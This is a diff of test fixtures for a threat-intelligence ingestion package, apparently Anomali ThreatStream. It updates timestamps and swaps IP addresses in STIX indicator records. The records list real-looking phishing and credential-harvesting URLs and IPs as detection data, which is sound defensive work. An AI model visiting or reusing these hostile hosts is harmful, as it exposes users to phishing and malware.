-31587,7 +31587,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390633259Z", + "ingested": "2021-12-13T08:38:40.026731800Z", "original": "{\"created\":\"2020-02-25T02:53:17.983Z\",\"description\":\"TS ID: 55347597481; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--5c9b2227-96df-4cc8-ba6b-c23f4da9667a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-25T02:53:17.983Z\",\"name\":\"mal_url: http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.983Z\"}", "category": "threat", "type": "indicator", @@ -31639,7 +31639,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390636756Z", + "ingested": "2021-12-13T08:38:40.026738600Z", "original": "{\"created\":\"2020-02-25T02:53:36.323Z\",\"description\":\"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:36.323Z\",\"name\":\"mal_url: http://agmardorecha.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://agmardorecha.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.323Z\"}", "category": "threat", "type": "indicator", @@ -31690,7 +31690,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390640192Z", + "ingested": "2021-12-13T08:38:40.026745400Z", "original": "{\"created\":\"2020-02-25T02:53:36.382Z\",\"description\":\"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-25T02:53:36.382Z\",\"name\":\"mal_url: http://149.28.186.68/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.186.68/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.382Z\"}", "category": "threat", "type": "indicator", @@ -31742,7 +31742,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390643679Z", + "ingested": "2021-12-13T08:38:40.026752200Z", "original": "{\"created\":\"2020-02-25T02:53:36.421Z\",\"description\":\"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:36.421Z\",\"name\":\"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.421Z\"}", "category": "threat", "type": "indicator", @@ -31761,7 +31761,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.14.14.191/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-25T02:53:42.111Z", "valid_from": "2020-02-25T02:53:42.111Z", @@ -31785,16 +31785,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://45.14.14.191/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "45.14.14.191", - "full": "http://45.14.14.191/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390647326Z", - "original": "{\"created\":\"2020-02-25T02:53:42.111Z\",\"description\":\"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-25T02:53:42.111Z\",\"name\":\"mal_url: http://45.14.14.191/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.14.14.191/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:42.111Z\"}", + "ingested": "2021-12-13T08:38:40.026759100Z", + "original": "{\"created\":\"2020-02-25T02:53:42.111Z\",\"description\":\"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-25T02:53:42.111Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:42.111Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31845,7 +31845,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390650912Z", + "ingested": "2021-12-13T08:38:40.026765900Z", "original": "{\"created\":\"2020-02-25T02:54:16.295Z\",\"description\":\"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:16.295Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/4/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/4/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:16.295Z\"}", "category": "threat", "type": "indicator", @@ -31897,7 +31897,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390654579Z", + "ingested": "2021-12-13T08:38:40.026772600Z", "original": "{\"created\":\"2020-02-25T02:54:21.544Z\",\"description\":\"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-25T02:54:21.544Z\",\"name\":\"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:21.544Z\"}", "category": "threat", "type": "indicator", @@ -31949,7 +31949,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390658086Z", + "ingested": "2021-12-13T08:38:40.026779400Z", "original": "{\"created\":\"2020-02-25T02:54:32.178Z\",\"description\":\"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:32.178Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:32.178Z\"}", "category": "threat", "type": "indicator", @@ -32001,7 +32001,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390661622Z", + "ingested": "2021-12-13T08:38:40.026786100Z", "original": "{\"created\":\"2020-02-25T02:54:37.327Z\",\"description\":\"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--44544bfd-7131-4530-a9de-96c1840101c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:54:37.327Z\",\"name\":\"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.327Z\"}", "category": "threat", "type": "indicator", @@ -32052,7 +32052,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390665369Z", + "ingested": "2021-12-13T08:38:40.026789400Z", "original": "{\"created\":\"2020-02-25T02:54:37.383Z\",\"description\":\"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:54:37.383Z\",\"name\":\"mal_url: http://0ooo.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0ooo.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.383Z\"}", "category": "threat", "type": "indicator", @@ -32104,7 +32104,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390669106Z", + "ingested": "2021-12-13T08:38:40.026794400Z", "original": "{\"created\":\"2020-02-25T02:54:48.929Z\",\"description\":\"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--b7d14453-ad19-4246-961a-72f0e5136874\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:54:48.929Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:48.929Z\"}", "category": "threat", "type": "indicator", @@ -32123,7 +32123,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 190.97.162.37", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime", "modified": "2020-02-25T02:54:54.632Z", "valid_from": "2020-02-25T02:54:54.632Z", @@ -32145,12 +32145,12 @@ "first_seen": "2020-02-25T02:54:54.632Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "190.97.162.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390672583Z", - "original": "{\"created\":\"2020-02-25T02:54:54.632Z\",\"description\":\"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--064f2766-97b6-481d-a273-f80a97524be8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:54:54.632Z\",\"name\":\"mal_ip: 190.97.162.37\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '190.97.162.37']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:54.632Z\"}", + "ingested": "2021-12-13T08:38:40.026815700Z", + "original": "{\"created\":\"2020-02-25T02:54:54.632Z\",\"description\":\"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--064f2766-97b6-481d-a273-f80a97524be8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:54:54.632Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:54.632Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32201,7 +32201,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390676611Z", + "ingested": "2021-12-13T08:38:40.026821700Z", "original": "{\"created\":\"2020-02-25T02:55:06.15Z\",\"description\":\"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--3f3bca20-c218-431d-8250-0f600b011971\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:06.15Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.15Z\"}", "category": "threat", "type": "indicator", @@ -32253,7 +32253,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390680227Z", + "ingested": "2021-12-13T08:38:40.026825400Z", "original": "{\"created\":\"2020-02-25T02:55:06.186Z\",\"description\":\"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:55:06.186Z\",\"name\":\"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.186Z\"}", "category": "threat", "type": "indicator", @@ -32272,7 +32272,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://92.63.197.191/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-25T02:55:06.314Z", "valid_from": "2020-02-25T02:55:06.314Z", @@ -32296,16 +32296,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://92.63.197.191/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "92.63.197.191", - "full": "http://92.63.197.191/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390683704Z", - "original": "{\"created\":\"2020-02-25T02:55:06.314Z\",\"description\":\"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1306883c-b911-4116-9121-492450e4bb07\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-25T02:55:06.314Z\",\"name\":\"mal_url: http://92.63.197.191/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.197.191/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.314Z\"}", + "ingested": "2021-12-13T08:38:40.026830500Z", + "original": "{\"created\":\"2020-02-25T02:55:06.314Z\",\"description\":\"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1306883c-b911-4116-9121-492450e4bb07\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-25T02:55:06.314Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.314Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32356,7 +32356,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390687922Z", + "ingested": "2021-12-13T08:38:40.026834500Z", "original": "{\"created\":\"2020-02-25T02:55:27.523Z\",\"description\":\"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:27.523Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:27.523Z\"}", "category": "threat", "type": "indicator", @@ -32408,7 +32408,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390691669Z", + "ingested": "2021-12-13T08:38:40.026838500Z", "original": "{\"created\":\"2020-02-25T02:55:35.424Z\",\"description\":\"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-25T02:55:35.424Z\",\"name\":\"mal_url: http://atomicwallet.email/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atomicwallet.email/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.424Z\"}", "category": "threat", "type": "indicator", @@ -32427,7 +32427,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://190.97.162.37/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime", "modified": "2020-02-25T02:55:35.462Z", "valid_from": "2020-02-25T02:55:35.462Z", @@ -32451,16 +32451,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://190.97.162.37/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "190.97.162.37", - "full": "http://190.97.162.37/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390727226Z", - "original": "{\"created\":\"2020-02-25T02:55:35.462Z\",\"description\":\"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--cb377636-13ce-421e-926f-e33e2b954263\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:55:35.462Z\",\"name\":\"mal_url: http://190.97.162.37/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://190.97.162.37/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.462Z\"}", + "ingested": "2021-12-13T08:38:40.026841800Z", + "original": "{\"created\":\"2020-02-25T02:55:35.462Z\",\"description\":\"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--cb377636-13ce-421e-926f-e33e2b954263\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:55:35.462Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.462Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -32511,7 +32511,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390866026Z", + "ingested": "2021-12-13T08:38:40.026846600Z", "original": "{\"created\":\"2020-02-25T02:55:35.496Z\",\"description\":\"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--1163cdee-566a-404a-b66e-657857eb4af3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:55:35.496Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.496Z\"}", "category": "threat", "type": "indicator", @@ -32530,7 +32530,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 195.133.201.191", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", "modified": "2020-02-25T02:55:39.691Z", "valid_from": "2020-02-25T02:55:39.691Z", @@ -32552,12 +32552,12 @@ "first_seen": "2020-02-25T02:55:39.691Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "195.133.201.191" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390873851Z", - "original": "{\"created\":\"2020-02-25T02:55:39.691Z\",\"description\":\"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:39.691Z\",\"name\":\"mal_ip: 195.133.201.191\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '195.133.201.191']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:39.691Z\"}", + "ingested": "2021-12-13T08:38:40.026873800Z", + "original": "{\"created\":\"2020-02-25T02:55:39.691Z\",\"description\":\"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:39.691Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:39.691Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json index db821cfd0ca..071b4d440fb 100644 --- a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json +++ b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json @@ -18,7 +18,7 @@ "state": "active", "import_session_id": 2832, "value_type": "domain", - "srcip": "203.0.113.39", + "srcip": "192.168.113.39", "org": "OVH Hosting", "date_last": "2020-10-08T12:24:42", "country": "FR", @@ -42,7 +42,7 @@ "state": "active", "update_id": 2406643974, "trusted_circle_ids": "500,12", - "srcip": "192.0.2.111", + "srcip": "192.168.2.111", "detail2": "imported by user 329", "value_type": "ip", "source_feed_id": 3817, @@ -68,7 +68,7 @@ "state": "active", "import_session_id": 3128, "value_type": "ip", - "srcip": "203.0.113.98", + "srcip": "192.168.113.98", "org": "Cox Communications", "asn": "22773", "date_last": "2020-10-08T12:24:42", @@ -115,7 +115,7 @@ "state": "active", "import_session_id": 1985, "value_type": "ip", - "srcip": "203.0.113.96", + "srcip": "192.168.113.96", "org": "Spectrum", "asn": "20001", "date_last": "2020-10-09T18:49:37", @@ -141,7 +141,7 @@ "state": "active", "import_session_id": 1570, "value_type": "ip", - "srcip": "203.0.113.157", + "srcip": "192.168.113.157", "org": "Spectrum", "asn": "11351", "date_last": "2020-10-09T18:49:37", @@ -157,7 +157,7 @@ "severity": "very-high", "classification": "private", "trusted_circle_ids": "775,702,615", - "detail": "gnh7,Botnet-DRZ8-,popularity=low,type=2,first_seen=2020-01-07T01:38:35,Botnet-WSPDZDY,mask=203.0.113.180,popularity=low,threat=gu3wn7", + "detail": "gnh7,Botnet-DRZ8-,popularity=low,type=2,first_seen=2020-01-07T01:38:35,Botnet-WSPDZDY,mask=192.168.113.180,popularity=low,threat=gu3wn7", "date_first": "2020-10-09T18:14:43", "source": "Phony generated indicator", "state": "active", @@ -165,7 +165,7 @@ "date_last": "2020-10-09T18:14:43", "domain": "frg.example.com", "lat": 41.9036, - "srcip": "192.0.2.19", + "srcip": "192.168.2.19", "detail2": "imported by user 606", "value_type": "domain", "source_feed_id": 2336, @@ -210,7 +210,7 @@ "update_id": 1334843074, "date_last": "2020-10-09T18:30:13", "trusted_circle_ids": "458,149", - "srcip": "203.0.113.163", + "srcip": "192.168.113.163", "detail2": "imported by user 813", "value_type": "url", "source_feed_id": 2988, @@ -235,7 +235,7 @@ "update_id": 3765836294, "date_last": "2020-10-09T18:30:13", "trusted_circle_ids": "320,876,412", - "srcip": "203.0.113.217", + "srcip": "192.168.113.217", "detail2": "imported by user 286", "value_type": "url", "source_feed_id": 2345, @@ -304,7 +304,7 @@ "update_id": 2618878309, "date_last": "2020-10-09T18:30:30", "trusted_circle_ids": "96,671,974", - "srcip": "203.0.113.62", + "srcip": "192.168.113.62", "detail2": "imported by user 67", "value_type": "url", "source_feed_id": 2250, @@ -496,7 +496,7 @@ "severity": "very-high", "classification": "public", "trusted_circle_ids": "206,131", - "detail": "-tc0y,6mp2f,033j,mask=203.0.113.47,threat=n922n81", + "detail": "-tc0y,6mp2f,033j,mask=192.168.113.47,threat=n922n81", "date_first": "2020-10-09T18:31:27", "source": "Phony generated indicator", "state": "active", @@ -549,7 +549,7 @@ "update_id": 2330081388, "date_last": "2020-10-09T18:31:34", "trusted_circle_ids": "163,899", - "srcip": "203.0.113.228", + "srcip": "192.168.113.228", "detail2": "imported by user 550", "value_type": "url", "source_feed_id": 823, @@ -639,7 +639,7 @@ "update_id": 3168103115, "date_last": "2020-10-09T18:31:49", "trusted_circle_ids": "581", - "srcip": "192.0.2.228", + "srcip": "192.168.2.228", "detail2": "imported by user 276", "value_type": "ip", "source_feed_id": 1942, @@ -664,7 +664,7 @@ "update_id": 3643377559, "date_last": "2020-10-09T18:31:49", "trusted_circle_ids": "997", - "srcip": "2001:db8:6186:eed0:6cbc:e2df:d062:6167", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "detail2": "imported by user 805", "value_type": "url", "source_feed_id": 2783, @@ -689,7 +689,7 @@ "update_id": 1454243906, "date_last": "2020-10-09T18:31:58", "trusted_circle_ids": "155,169", - "srcip": "203.0.113.73", + "srcip": "192.168.113.73", "detail2": "imported by user 298", "value_type": "url", "source_feed_id": 428, @@ -845,7 +845,7 @@ "update_id": 2438380210, "date_last": "2020-10-09T18:32:30", "trusted_circle_ids": "591,520,447", - "srcip": "203.0.113.244", + "srcip": "192.168.113.244", "detail2": "imported by user 337", "value_type": "ip", "source_feed_id": 2276, @@ -892,7 +892,7 @@ "update_id": 1095205177, "date_last": "2020-10-09T18:33:10", "trusted_circle_ids": "77,529", - "srcip": "203.0.113.179", + "srcip": "192.168.113.179", "detail2": "imported by user 252", "value_type": "url", "source_feed_id": 241, @@ -983,7 +983,7 @@ "update_id": 3508566543, "date_last": "2020-10-09T18:33:22", "trusted_circle_ids": "396,599,717", - "srcip": "203.0.113.134", + "srcip": "192.168.113.134", "detail2": 